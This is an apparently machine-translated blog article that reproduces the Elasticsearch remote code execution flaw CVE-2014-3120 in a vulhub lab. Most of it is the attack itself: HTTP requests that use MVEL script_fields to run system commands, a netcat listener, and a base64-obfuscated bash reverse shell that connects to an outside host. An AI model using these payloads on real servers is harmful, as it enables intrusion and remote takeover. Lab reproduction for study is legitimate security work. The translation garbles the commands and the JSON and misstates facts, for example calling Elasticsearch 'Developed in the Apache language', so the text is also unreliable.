Shulou(Shulou.com)05/31 Report--

This article is about how to achieve ElasticSearch remote code execution vulnerability CVE-2014-3120 reproduction of the analysis, the editor thinks it is very practical, so share with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

Elasticsearch is a Lucene-based search server. It provides a full-text search engine with distributed multi-user capability, based on RESTful web interface. Developed in the Apache language and released as open source under the Apache license terms, Java is a popular enterprise search engine.

ElasticSearch has the function of running script, so it is very convenient to reprocess the queried data. The scripting engine used by ElasticSearch is MVEL, which has no protection, so it can run arbitrary code directly. In ElasticSearch, the default configuration is to turn on dynamic scripting, so users can run arbitrary code directly through http requests.

ElasticSearch version: v1.1.1

Only for vulnerability recurrence recording and implementation, the utilization process is as follows:

I. Construction of loophole environment

The vulnerability environment in this article is built with vulhub. Execute the following command to open the environment.

Cd / elasticsearch/CVE-2014-3120

Docker-compose build

Docker-compose up-d

Access port 9200 after execution, which is displayed as follows

Vulnerability link: http://192.168.101.152:9200/

2. Vulnerability exploitation process

To exploit this vulnerability, first of all, at least one piece of data exists in ElasticSearch, and the following packets are sent to add data

POST / website/blog/ HTTP/1.1

Host: 192.168.91.130:9200

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Content-Length: 27

{

"name": "colleget"

}

The 201 status code indicates that it has been successfully added, and then the following data packet is sent to execute the command.

POST / _ search?pretty HTTP/1.1

Host: 192.168.91.130:9200

Content-Type: application/x-www-form-urlencoded

Content-Length: 366

{

"size": 1

"query": {

"filtered": {

"query": {

"match_all": {

}

}

}

}

"script_fields": {

"command": {

"script": "import java.io.*;new java.util.Scanner (Runtime.getRuntime (). Exec (\" id\ "). GetInputStream (). UseDelimiter (\"\ A\ ") .next ();"

}

}

}

}

}

You can see the echo of the execution result, followed by a bounce shell, and a script is written for convenience

First get the domain name on the dnslog, and then execute the command to determine that the target can go out of the network.

Then execute nc-lvvp 1234 on the server, listen on the port, and then execute the command

Bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==} | {base64,-d} | {bash,-i}

Wait a moment and you can see shell bounce back to the server.

The above is the analysis of how to achieve the recurrence of ElasticSearch remote code execution vulnerability CVE-2014-3120. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.